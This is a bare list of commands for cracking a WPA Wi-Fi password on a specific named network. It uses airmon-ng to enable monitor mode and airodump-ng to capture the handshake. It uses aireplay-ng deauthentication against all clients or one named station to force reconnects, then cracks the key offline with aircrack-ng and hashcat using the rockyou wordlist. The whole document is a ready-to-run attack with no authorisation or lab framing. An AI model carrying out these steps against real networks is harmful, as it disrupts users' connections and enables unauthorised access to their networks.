All commands are executed as root.
ip addr
or
ifconfig
airmon-ng check kill
airmon-ng start wlan0
airmon-ng
You could also use
ifconfig
to check if the interface is in monitor mode.
airodump-ng wlan0mon
Target:
ESSID: TPGuest-77E0
BSSID: 82:8F:1D:FB:77:E0
Channel: 1
airodump-ng -w TPGuest-77E0 -c 1 --bssid 82:8F:1D:FB:77:E0 wlan0mon
[To all stations]
aireplay-ng --deauth 10 -a 82:8F:1D:FB:77:E0 wlan0mon
[To a specific station]
aireplay-ng --deauth 10 -a 82:8F:1D:FB:77:E0 -c 18:01:F1:B2:B3:02 wlan0mon
aircrack-ng TPGuest-77E0-01.cap
or
wireshark TPGuest-77E0-01.cap
Press
ctrl+F
and inputeapol
, then pressenter
. Check if there are 4 EAPOL packs (Message 1 ~ Message 4). If not, recapture.
airmon-ng stop wlan0mon
aircrack-ng TPGuest-77E0-01.cap -w /usr/share/wordlists/rockyou.txt
-
Convert
*.cap
to*.hc22000
hcxpcapngtool ./TPGuest-77E0-01.cap -o TPGuest-77E0-01.hc22000
-
Start hashcat
hashcat -m 22000 TPGuest-77E0-01.hc22000 /usr/share/wordlists/rockyou.txt
-
Show cracked passwords
hashcat -m 22000 --show TPGuest-77E0-01.hc22000